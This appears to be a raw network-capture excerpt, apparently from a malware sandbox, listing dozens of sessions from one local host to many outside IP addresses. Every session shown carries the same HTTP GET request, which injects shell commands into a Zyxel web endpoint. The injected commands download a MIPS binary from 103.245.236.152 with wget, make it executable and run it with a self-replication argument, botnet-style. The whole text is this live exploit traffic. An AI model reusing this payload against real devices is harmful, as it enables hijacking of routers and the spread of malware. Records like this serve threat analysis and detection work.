                                          Jan 14, 2024 15:46:02.734350920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1187192.168.2.2344314212.178.41.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.734386921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1188192.168.2.2346848128.65.57.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.734426975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1189192.168.2.2340182108.193.102.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.734447956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1190192.168.2.234120074.118.161.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.734494925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1191192.168.2.233749094.59.86.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.734494925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1192192.168.2.233698248.28.127.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.734520912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1193192.168.2.2340936197.191.121.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.734575987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1194192.168.2.234963662.146.112.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.734602928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1195192.168.2.233839299.169.42.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.734606028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1196192.168.2.2342294104.119.33.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.734658957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1197192.168.2.2357394197.232.137.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.734682083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1198192.168.2.2332814213.39.162.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.734735966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1199192.168.2.234627069.64.174.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.734760046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1200192.168.2.2338428117.242.248.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.734777927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1201192.168.2.2344698189.177.194.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.737256050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1202192.168.2.234905450.167.2.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.737302065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1203192.168.2.2349028180.49.214.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.737391949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1204192.168.2.234845872.207.171.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738147974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1205192.168.2.2340110177.211.53.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738172054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1206192.168.2.2352848178.48.237.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738192081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1207192.168.2.2358154167.5.116.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738205910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1208192.168.2.2342466146.110.252.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738254070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1209192.168.2.235096268.181.154.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738271952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1210192.168.2.235466045.249.63.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738306999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1211192.168.2.2341490128.57.106.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738339901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1212192.168.2.2338392134.39.199.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738364935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1213192.168.2.234075867.26.125.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738409996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1214192.168.2.2352808134.62.174.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738419056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1215192.168.2.234902281.5.88.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738445044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1216192.168.2.233321023.28.208.121443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738488913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1217192.168.2.2333514136.240.101.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738521099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1218192.168.2.233752886.106.4.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738548040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1219192.168.2.2354220115.72.98.92443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738560915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1220192.168.2.2359178105.150.71.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738609076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1221192.168.2.2350388164.224.237.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738636017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1222192.168.2.2334244171.52.204.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738671064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1223192.168.2.2338216205.106.42.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738684893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1224192.168.2.2346370135.24.179.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738727093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1225192.168.2.2338272159.71.18.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738744020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1226192.168.2.2354624152.249.145.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738799095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1227192.168.2.234317234.53.223.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738863945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1228192.168.2.2333488190.22.40.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738871098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1229192.168.2.233430440.197.105.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738907099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1230192.168.2.235504652.55.210.160443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738907099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1231192.168.2.2343414132.150.191.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738941908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1232192.168.2.235868017.145.233.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738960028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1233192.168.2.2358284122.224.135.206443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.738991022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1234192.168.2.2356636109.192.247.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.739039898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1235192.168.2.2354526212.31.144.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.739067078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1236192.168.2.2337240192.2.234.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.739089012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1237192.168.2.2359778129.52.226.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.739103079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1238192.168.2.235998818.82.168.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.739164114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1239192.168.2.2354436198.184.39.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.739168882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1240192.168.2.2348022184.172.128.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.739221096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1241192.168.2.2345154120.248.166.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.739243984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1242192.168.2.2339642174.112.147.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.739252090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1243192.168.2.23385322.57.80.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.739314079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1244192.168.2.2335684144.131.222.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.739339113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1245192.168.2.235406480.199.6.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.739351034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1246192.168.2.2351056201.126.174.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.739377022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1247192.168.2.235298863.125.238.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.739415884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1248192.168.2.2347664118.113.121.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:02.739428043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1249192.168.2.2360572173.116.221.38443
                                          TimestampBytes transferredDirectionData
